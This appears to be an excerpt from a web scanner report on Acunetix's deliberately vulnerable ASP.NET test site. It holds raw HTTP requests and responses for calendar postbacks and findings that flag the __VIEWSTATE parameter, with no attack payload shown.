Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8534&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAKikOVNsIZGRkXKlggTnRuP2kiRHozW0jZQ7Tom8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKj4v5OAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb%2FeCQLmnb%2FeCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne%2FDDALmne%2FDDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ%2B5AwLmnZ%2B5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU%2FAvukpT8C%2B6TZ0wkC%2B6TZ0wkC%2B6TN9gIC%2B6TN9gIC%2B6ThjQoC%2B6ThjQoC%2B6SVoAMC%2B6SVoAMC%2B6SJxwwC%2B6SJxwwC%2B6T9rAkC%2B6T9rAkC%2B6SRwwIC%2B6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu%2F%2BQ8C3Mu%2F%2BQ8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL%2B9cJAtzL%2B9cJAtzL7%2BoCAtzL7%2BoCAtzLw9MPAtzLw9MPAtzL9%2FYIAtzL9%2FYIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDePmFQvI%2Facl59UUSiIXUUcP1xSM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:10 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAKikOVNsIZGRkXKlggTnRuP2kiRHozW0jZQ7Tom8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKj4v5OAtCn5uMHAqrO1NAFAo332KgDAo332KgDAo33zM8MAo33zM8MAo334OIFAo334OIFAo33lLkNAo33lLkNAo33iNwGAo33iNwGAo33vPMPAo33vPMPAo330JcHAo330JcHAo33xCoCjffEKgKN97iSDQKN97iSDQKN96ypBgKN96ypBgLmnb/eCQLmnb/eCQLmndPyAgLmndPyAgLmnceJCgLmnceJCgLmnfusAwLmnfusAwLmne/DDALmne/DDALmnYPmBQLmnYPmBQLmnbe9DQLmnbe9DQLmnavQBgLmnavQBgLmnZ+5AwLmnZ+5AwLmnbPcDALmnbPcDAL7pJ3FDwL7pJ3FDwL7pLGYBwL7pLGYBwL7pKU/AvukpT8C+6TZ0wkC+6TZ0wkC+6TN9gIC+6TN9gIC+6ThjQoC+6ThjQoC+6SVoAMC+6SVoAMC+6SJxwwC+6SJxwwC+6T9rAkC+6T9rAkC+6SRwwIC+6SRwwIC3Mvj6AUC3Mvj6AUC3MuXjw0C3MuXjw0C3MuLogYC3MuLogYC3Mu/+Q8C3Mu/+Q8C3MvTnQcC3MvTnQcC3MvHMALcy8cwAtzL+9cJAtzL+9cJAtzL7+oCAtzL7+oCAtzLw9MPAtzLw9MPAtzL9/YIAtzL9/YIArHSwZ8KArHSwZ8KArHS9bIDArHS9bIDePmFQvI/acl59UUSiIXUUcP1xSM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:White" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8522&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDANSygStsIZGRkkB1yhN9QOMB2Aw%2B5NXD%2BMlJxWPw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKO%2BsCpBwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAz6Sq5sfyVn9h0eEr4IyY2toh4dm
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:53 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDANSygStsIZGRkkB1yhN9QOMB2Aw+5NXD+MlJxWPw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKO+sCpBwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAz6Sq5sfyVn9h0eEr4IyY2toh4dm" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:White" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
